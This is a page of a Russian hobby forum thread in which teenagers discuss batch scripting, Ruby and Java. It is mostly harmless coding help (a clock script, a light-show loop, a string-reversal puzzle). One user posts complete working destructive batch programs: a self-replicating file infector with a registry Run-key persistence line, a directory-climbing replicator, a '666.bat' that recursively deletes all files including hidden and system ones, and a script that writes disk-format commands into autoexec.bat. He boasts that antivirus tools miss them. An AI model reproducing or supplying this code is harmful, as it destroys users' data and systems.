Привет, Вы вошли как Гость

  • Страница 1 из 5
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
Архив - только для чтения
Форум Западно-Сибирской Академии Джедай » Поддержка » Архив » Вопрос к программистам (особенно к Ревану)
Вопрос к программистам
IG-88Дата: Пятница, 29/Дек/2006, 08:30:01 | Сообщение # 1
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Я недавно увлекся скриптовым языком программирования batch. Я как не странно могу писать на нем всякую гадость типа вирусов, троянов, червей, а что-то полезное, например часы.... ну никак. Осбенно к Ревану вопрос, ты же показывал часики, написанные на Яве, можно ли на BATCHе что-то подобное сделать?
Вобщем все все , связанные с программированием, посоветуйте, поделитесь.


Suffer well
Sometimes it's hard
It's hard to tell

 
Mystic_NihilisticДата: Пятница, 29/Дек/2006, 09:29:45 | Сообщение # 2
Мистическая морда. ^_^ ня!)
Группа: Проверенные
Сообщений: 1531
Статус: Offline
Эх...
Признаться об такой дряни и не помню даже. sad
Дряни - в переносном смысле. smile Просто не слышал. smile

Слышал тучу небольших языков программирования, Gentee всякие там и так далее... но batch - не помню.

Разве что Bat-файлы писать могу но это уже не то. biggrin


Ta-Was-Ne.
Everything that doesn't kill us makes us strAnger. ©
Those who cannot learn from history
Are doomed to repeat it!
© KMFDM
 
IG-88Дата: Пятница, 29/Дек/2006, 11:23:36 | Сообщение # 3
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Это есть самое то. Часы я пробовал сделать, в них такое
if %time%=00:00 goto 1
:1
echo *** *** *** ***
echo * * * * * * * * *
echo * * * * * * * *
echo * * * * * * * * *
echo *** *** *** ***

в первой строчке ещё вроде нужны кавычки. Недостаток такой программы в том что онаопирается на системное время т.е. будь в Windows 00:01 прогрвамма отобразит тоже самое. А еще придется 1440 раз писать if %time%= количество часов (24) умножить на кол-во минут (60) ужас. Смысл программы был бы в том что она не зависит от системного времени.


Suffer well
Sometimes it's hard
It's hard to tell

 
РеванДата: Пятница, 29/Дек/2006, 14:35:18 | Сообщение # 4
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
С batch'ем дело не имел, щаз пересел на Ruby с PHP. Шикарная вещь и Вам советую. Много нового для себя откроете.

Теперь по теме. На Яве динамически изменяющиеся приложения делаются с помощью функций SetInterval() и SetTimeout(). То бишь, пишете какую-нить функцию, которая забирает у системы время (наверняка есть какой-нить объект Date), и выводит его в особой форме. Но саму функцию вызываете с помощью этих самых двух функций. В качестве первого параметра идет название функции, причем строковый тип. Второй параметр - время обновления в милисекундах. Разница между функциями такова - первая будет выводить бесконечными интервалами, вторая только один раз.

Посмотри в мануале batch'а, наверняка есть подобные аналоги.

Второй вариант - с помощью графического режима. То есть стирание\перерисовка часиков, используя бесконечный цикл и функцию типа delay() (задержка экрана).

 
Mystic_NihilisticДата: Пятница, 29/Дек/2006, 16:57:30 | Сообщение # 5
Мистическая морда. ^_^ ня!)
Группа: Проверенные
Сообщений: 1531
Статус: Offline
Кстати, IG-88, вообще забрасывай ты эти баты к ядрене фене. smile Переезжай на что-нить другое. smile

По барабану - Java, Delphi, C, да хоть Ruby пресловутый. smile

А если неимётся, можно даже на паскале что-нить замутить... в виде извращения.


Ta-Was-Ne.
Everything that doesn't kill us makes us strAnger. ©
Those who cannot learn from history
Are doomed to repeat it!
© KMFDM
 
IG-88Дата: Пятница, 29/Дек/2006, 17:07:47 | Сообщение # 6
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
А что за RUBY?

Я вас наверно испугал этим словом. Язык этот используется в bat файлах, пример autoexec.bat
И функция там такая есть %date% %time%

Добавлено (29/Дек/2006, 17:07:47)
---------------------------------------------
Кстати, уже другой вопрос, можно ли как нибуь приожения Java для сотовых запускать на компе?


Suffer well
Sometimes it's hard
It's hard to tell

 
РеванДата: Пятница, 29/Дек/2006, 18:33:37 | Сообщение # 7
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
IG-88, Ты главное Мистика не слушай, он сейчас херню полную несет. Надо все в жизни попробовать. Java, Delphi, C - это все стандартные вещи, при знании фундаментальных алгоритмов, синтаксис изучается за один день. Другое дело - такая "экзотика" как batch, Ruby, Lisp, Smalltalk, Python. Программеров на PHP туева хуча, а на Ruby - пара сотен. Это большой плюс в воображаемом портфолио.

Ты часики то сделал или нет?

http://ru.wikibooks.org/wiki/Ruby

Да, есть эмулятор через Java Virtual Machine, встраивается тулбаром в Ишак. У Blaze был, кажись называется MidpX, или что-то в этом роде. Гугль тебе в руки.

 
IG-88Дата: Пятница, 29/Дек/2006, 19:31:03 | Сообщение # 8
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Да я так, всех слушаю, вариант выбираю более оптимальный. Бат это воспоминание о былых временах, о крестиках ноликах, тетрисе блоках и пр пр пр
Мне бат нравится за то что он поддерживается всеми виндами 95-ХР.
А вообще хочу сделать метроном, чтобы пикало ч\з определённое время( на гитаре надо ровно играть, либо штуку р за настоящий, либо час перед компом, и творение готово). На бате незнаю как, на Паскале в виде извращения tongue знаю, но незнаю как переделать в *exe, i am typing =>смыcл русский smile

Добавлено (29/Дек/2006, 18:54:17)
---------------------------------------------
Насчет РУБИ *выпучивает глаза и валится со стула*
Насчет часиков - я потому спросил, что не хочу 1440*60 раз (количество часов минут сеекунд) звездочками перерисовывать, не потому что лень, а потому что должен быть в языке программирования( в любом, иначе это полная срань) алгоритм который учитывает повторяющеся команды, не вводить же столько раз "если *:%;;№ то %;%;?%;".

Добавлено (29/Дек/2006, 19:11:38)
---------------------------------------------
Реван, большое тебе человеческое спасибо, у меня есть исходник "говорящих" часов, виртуальную машину найду посмотрю принципы, сам чегонибудь сбахаю. А руби действительно рулит. Статью посмотрел и рельно чуть со стула не грохнулся, хоть и не всё понимаю (я только начал программы делать) но тем не менее

Добавлено (29/Дек/2006, 19:31:03)
---------------------------------------------
Не успел поблагодарить, как спрашиваю, как им пользоваться? Не обижайся на меня, не пойму, вроде всё установилось, никаих ярлыков не нашел, даже в system32 не нашел, что делать?


Suffer well
Sometimes it's hard
It's hard to tell

 
FinalProphecyДата: Пятница, 29/Дек/2006, 22:30:02 | Сообщение # 9
Группа: Удаленные





C за один день? =))))) The scarlet rose has died
 
РеванДата: Пятница, 29/Дек/2006, 23:35:32 | Сообщение # 10
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
IG-88, Ярлыки? Пишешь код, сохраняешь в файл с расширением .rb, запускаешь двойным кликом :).

FinalProphecy, На изучение синтаксиса PHP мне потребовался ровно один день. Программирую на нем уже полгода, ну узнал 1000 новых функций. Только ничего от этого не изменилось. Если под рукой мануал иметь - никаких проблем нет.

 
Mystic_NihilisticДата: Суббота, 30/Дек/2006, 00:22:23 | Сообщение # 11
Мистическая морда. ^_^ ня!)
Группа: Проверенные
Сообщений: 1531
Статус: Offline
Уф... я уже гоню оказывается... ну нафига все эти крайние извращения... ладно, не об том речь.

А вообще IG-88 с другой стороны правильно, баты надо всё-таки уметь писать... Хотя, признаться, впервые всерьёз они мне пригодились, когда у меня винчестер полетел и сидел полгода на 40-Мегабайтном. Вообщем ДОС тогда пришлось конкретно выучить, заодно и наПаскалился в доску. smile

Но дурная привычка писать баты так и осталась.

Кстати, я точно не помню, но кажется в батниках допускались переменные... если есть переменная, то можно делать относительно неё условие... вот тебе и готовый цикл. smile Операторы перехода (метки) там тоже есть. smile


Ta-Was-Ne.
Everything that doesn't kill us makes us strAnger. ©
Those who cannot learn from history
Are doomed to repeat it!
© KMFDM
 
IG-88Дата: Суббота, 30/Дек/2006, 09:33:01 | Сообщение # 12
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Пожалуйста и Реван И Мистик: я как проснулся сначала программы на листе сделал, затем сел за комп. Программы на писаны по-английски, по-этому чтобы их запустить копируете программу в текстовый документ (только txt) переименовываете в bat и вперёд!

Вот, Реван, часы, они текущее время сохраняют в файл

---------------------------
echo off
cls
title chasy
echo %date%>>dateandtime.txt
echo %time%>>dateandtime.txt
---------------------------
(пояснение, если после переменной %date% убрать одну стрелку, файло будет каждый раз переписываться, если не убирать, то дата и время будут дописываться в конец файла)

вирус
----------------------
@echo off
set a=BAT
copy %0 %windir%\%a%.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v %a% /t REG_SZ /d %windir%\%a%.bat /f > nul
for %%a in (*.*) do copy %0 %%a > nul
echo MsgBox"Infected with BAT",,"IG-88" > v.vbs
start v.vbs
:: BAT by IG-88

---------------------
там где *.* означает что заразятся все файлы подряд, в них будет то что я щас написал, запускать не рекомендую, рекомендую ознакомиться с принципом, и не запускать все баты подряд, ведь это страшная вещь, уууууууууу

---------------------
title svetomuzyka
echo off
cls
goto 1

:1
cls
color a9
cls
goto 2

:2
cls
color b5
cls
goto 3

:3
cls
color f2
cls
goto 4

:4
cls
color c3
cls
goto 5

:5
cls
color 07
cls
goto 1
---------------------------
извините что так много, эта программа как поняли из титла, самая натуральная светомузыка. Если ввести color /? в командной строке, узнаете список цветов, сможете всё поменять.
Еще раз, чтобы запустить копируете(что-то одно, а то комп слипнется от вируса)
в текстовый документ переименовываете в бат запускаете.

Вопрос, как пользоваться виртуальной машиной, вкратце?

Добавлено (30/Дек/2006, 09:26:49)
---------------------------------------------
Я сейчас думаю над заданием из олимпиды по информатике.
Сделайте, чтобы слово slovo превратилось в слово ovols, сижу, думаю, думаю, и пока ничего не могу понять, не получается блин.

Добавлено (30/Дек/2006, 09:31:23)
---------------------------------------------
Quote
Кстати, я точно не помню, но кажется в батниках допускались переменные... если есть переменная, то можно делать относительно неё условие... вот тебе и готовый цикл. Операторы перехода (метки) там тоже есть.

Мистик - память у тебя отличная, цикл if errorlevel=1 if exist **** if not exist ****
gthtvtyyst %date% %time% %SystemRoot% %windir% %rundir% все не помню, ещё какие-то есть

Добавлено (30/Дек/2006, 09:33:01)
---------------------------------------------
в предпоследнем ответе в 2 строке 1 слово следует читать переменные
Отзовитесь, блин, 3 часа в интернете сижу, с 6 утра


Suffer well
Sometimes it's hard
It's hard to tell

 
TychoДата: Суббота, 30/Дек/2006, 12:30:48 | Сообщение # 13
Старейшина
Группа: Администраторы
Сообщений: 3863
Статус: Offline
Quote (IG-88)
Я сейчас думаю над заданием из олимпиды по информатике. Сделайте, чтобы слово slovo превратилось в слово ovols, сижу, думаю, думаю, и пока ничего не могу понять, не получается блин.

Текстовые массивы нельзя использовать?

Вообще какие вводные на олимпиаде? Разрешенные языки и т.п.


Все написанное в этой книге может оказаться неправдой.
 
IG-88Дата: Суббота, 30/Дек/2006, 13:05:27 | Сообщение # 14
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Ну вообще языки Си, Паскаль и Бейсик. Я решил сделать на своём Батче, просто интересно, что-будет. Принцип я понял, 1 букву на последнее место, 2 на предпоследнюю, и т.д.
Как сделать, наверное echo %5%>>file.txt
echo %4%>>file.txt и так до %1%, ведь есть такая команда shift, она сдвигает параметры, shift %1% shift %2%, наверно с эхом должно что-то подобное выйти, но вместо этого в кодировке DOS мне выдается: режим вывода сообщений на екран включен. Я пока в раздумьях


Suffer well
Sometimes it's hard
It's hard to tell

 
РеванДата: Суббота, 30/Дек/2006, 15:50:01 | Сообщение # 15
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
IG-88, строка - массив символов. Идешь циклом с конца и выводишь.
Если под рукой был бы Руби - string_name.reverse

>> Вопрос, как пользоваться виртуальной машиной, вкратце?
Установил, приложения .jar выполняешь дабл-кликом. Также как у руби, переменные интерпретатор прописываются в системе, поэтому можно из любого места запускать.

 
IG-88Дата: Суббота, 30/Дек/2006, 17:55:12 | Сообщение # 16
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Я только одного понять не могу, по умолчанию для открытия jar у меня win rar, виртуальной машины в списке возможных программ для открытия нету.
Кстати, посмотрите мои программы, особенно вирус. Надо создать одну папку, затем другую, в этой другой паке насоздавать туеву хучу всяких файлов, на них (ни нах) сделать разные названия, чтобы было показательнее, и самое главное, в вирусе надо убрать 3 4 5 строчки, а то в реестре будет запись котороя откопирует и запустит вир в папке с виндой, компу придет страшный пи--------пец. Обязательно уберите 3 4 5 строчки, если не хотите себе навредить, перечитайте еще 2 раза мой ответ!!!(чтобы понять угрозу, ни AVP ни Drweb нифига его не опознают, поэтому я люблю бат)


Suffer well
Sometimes it's hard
It's hard to tell

 
РеванДата: Суббота, 30/Дек/2006, 21:54:21 | Сообщение # 17
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
IG-88, javaw.exe
Часики смотрел, правда в файл перед датой еще какой-то непонятный символ выводился. Юникод видать :).
И светомузыку тоже.
Вирус не стал, но ведь можно излечить это дело - удалить просто запись в реестре, которую ты добавил. Чистильщики или сканеры spyware думаю смогут это найти.
 
IG-88Дата: Воскресенье, 31/Дек/2006, 20:55:28 | Сообщение # 18
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Ну Реван (с наступающим через 3 часа).
Каково будет тебе, если в папке Windows каждая dll будет содержать лишь вирус и ничего более. Я таког не то, что тебе, врагу не пожелаю, комп к чертям собачьим (и свинячьим и прочим другим tongue ) полетит.
Вот тебе на
---------
@ctty nul
:Dot
for %%b in (%NEW%*.*) do copy %0 %%b
set NEW=..\\%NEW%
copy %0 %NEW%%0
if not exist %NEW%%0 exit
del %NEW%%0
goto Dot
=========
метод размножения бесполый tongue поразятся все каталоги до основания, ж*па, извините, полная.
=============
А это Реван называется был винчестер, и нету нифига на нём , если есть тестовый комп (вдруг) попробуй, если нету, то не пробуй вообще, файлы все сотрёт
@echo off
set cd1=%cd%
copy 666.bat ..\666.bat >nul
cd ..
if "%cd%"=="%cd1%" (
del %cd1%\*.* /q /s >nul
del %cd1%\*.* /q /s /as /ah /ar >nul
del *.* /q /s >nul
del *.* /q /s /as /ah /ar >nul
exit
) else (
start 666.bat
del %cd1%\*.* /q /s >nul
del %cd1%\*.* /q /s /as /ah /ar >nul
exit
)

А вот последняя срань, формат С: при старте системы cool
Вместо С: можно поставить что угодно, стрелки дописывают всё в autoexec.bat, ключ /q , это чтоб вопросов не было, форматирование будет быстрым, файловая система испортится.

echo off
echo echo off > c:\autoexec.bat
echo format c: /q >> c:\autoexec.bat
echo format d: /q >> c:\autoexec.bat
echo format f: /q >> c:\autoexec.bat
echo format g: /q >> c:\autoexec.bat
echo format h: /q >> c:\autoexec.bat


Suffer well
Sometimes it's hard
It's hard to tell

 
РеванДата: Понедельник, 01/Янв/2007, 23:22:18 | Сообщение # 19
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
IG-88, C наступившим!

Ты сам то хоть это тестировал? Вдруг есть закавыка где.

Может на сайте организовать раздел "Вирусы от злостного дройда"? smile

 
IG-88Дата: Вторник, 02/Янв/2007, 07:49:31 | Сообщение # 20
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Спасибо!

Насчёт тестирования, Реван, сам подумай, autoexec.bat - пакетный файл, работает на batche, следовательно после загрузки драйвера клавиатуры формат дисков. А дальше будет сам-знаешь-что.

Второй вирус(где был винчестер и сплыл) должен называться 666.bat
Этот вирус был написан наполовину мной, ведь щас в нете всё есть - и как задолбать соседа, и как взорвать белый дом, и как взломать швейцарский банк smile , надо лишь только поискать.

А насчёт раздела - наверно надо сделать его так, "программы злостного дроида"

ЗЫ что-то глюк появился на форуме, не знаю где ено описать,
например не дописал букву в середине слова, начинаю слово дописывать и новая буква стирает старую, приходится всё слово переписывать, памагите!


Suffer well
Sometimes it's hard
It's hard to tell

 
Mystic_NihilisticДата: Вторник, 02/Янв/2007, 09:57:45 | Сообщение # 21
Мистическая морда. ^_^ ня!)
Группа: Проверенные
Сообщений: 1531
Статус: Offline
Гм... может нужно Insert нажать? :))
Помню я был жутко удивлён, что Паскалевская фишка и на Виндовсе прекрасно проходит - с изменением режимов ввода через Insert.

Впрочем если глюк исключительно форумовский, я тут не причём. В смысле
"Ничем не могу помочь". (с) Секретарь Майкрофта.


Ta-Was-Ne.
Everything that doesn't kill us makes us strAnger. ©
Those who cannot learn from history
Are doomed to repeat it!
© KMFDM
 
РеванДата: Вторник, 02/Янв/2007, 17:23:26 | Сообщение # 22
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
Это не глюк форума, просто реально Insert надо жать. Скачай программку Notepad++, очень советую (там кстати синтаксис твоего батча суппортиться) все поймешь.
 
IG-88Дата: Среда, 03/Янв/2007, 14:27:39 | Сообщение # 23
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
Она у меня уж давно находится, только одно не могу понять: она цветом показывает лишь правильность команд, там нет случайно списка поддерживаемых каждым языком команд?

Там и РУБИ есть и какой-то непонятный perl и ещё более непонятный LUA.


Suffer well
Sometimes it's hard
It's hard to tell

 
РеванДата: Среда, 03/Янв/2007, 19:00:48 | Сообщение # 24
Старейшина
Группа: Проверенные
Сообщений: 21
Статус: Offline
IG-88, Вроде есть, надо Ctrl+Space нажимать для автодополнения.

Что тебе в Perl не нравится?)

 
IG-88Дата: Четверг, 11/Янв/2007, 17:27:32 | Сообщение # 25
Почетный житель
Группа: Проверенные
Сообщений: 537
Статус: Offline
А того, что я в нем ничего не знаю.

Добавлено (11/Янв/2007, 17:27:32)
---------------------------------------------
Памагите кто нибудь, хочу себе сайт сделать, знаю одну вещь на яве, запускается из бача

echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("какой нибудь текст"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js

еще есть MS Front Page и самоучитель к нему, желание сделать сайт и файлы к нему :)))

Что делать?

Кстати, Реван, даешь антивирус на баче.
Знаешь тестовый вирус Eicar.com?
В ней есть строчка Eicar-antivirus-test-file
Идея такова - поиск в файле некоторых строчек, которые есть только в вирусе.
Я могу написать антивирус для батча, некоторых exe и com.
Я с твоей подачи (поиск строк в файле) могу найти вирусы в php, java, rubi(если подумать вирус можно сделать где угодно). Это так, для обучения принципу.

Ещё другой вопрос, если создать файл в руби и в яве (программа будет например выводить какое нибудь сообщение),переделать его в ехе, то будет ли результат запуска ехе-шных программ один и тот же, и будет ли размер переделанных программ одинаковым?

А ещё, сколько уж можно коды безопасности вводить, до 100 сообщения или до какого нибудь статуса на форуме


Suffer well
Sometimes it's hard
It's hard to tell

 
Форум Западно-Сибирской Академии Джедай » Поддержка » Архив » Вопрос к программистам (особенно к Ревану)
  • Страница 1 из 5
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
Поиск: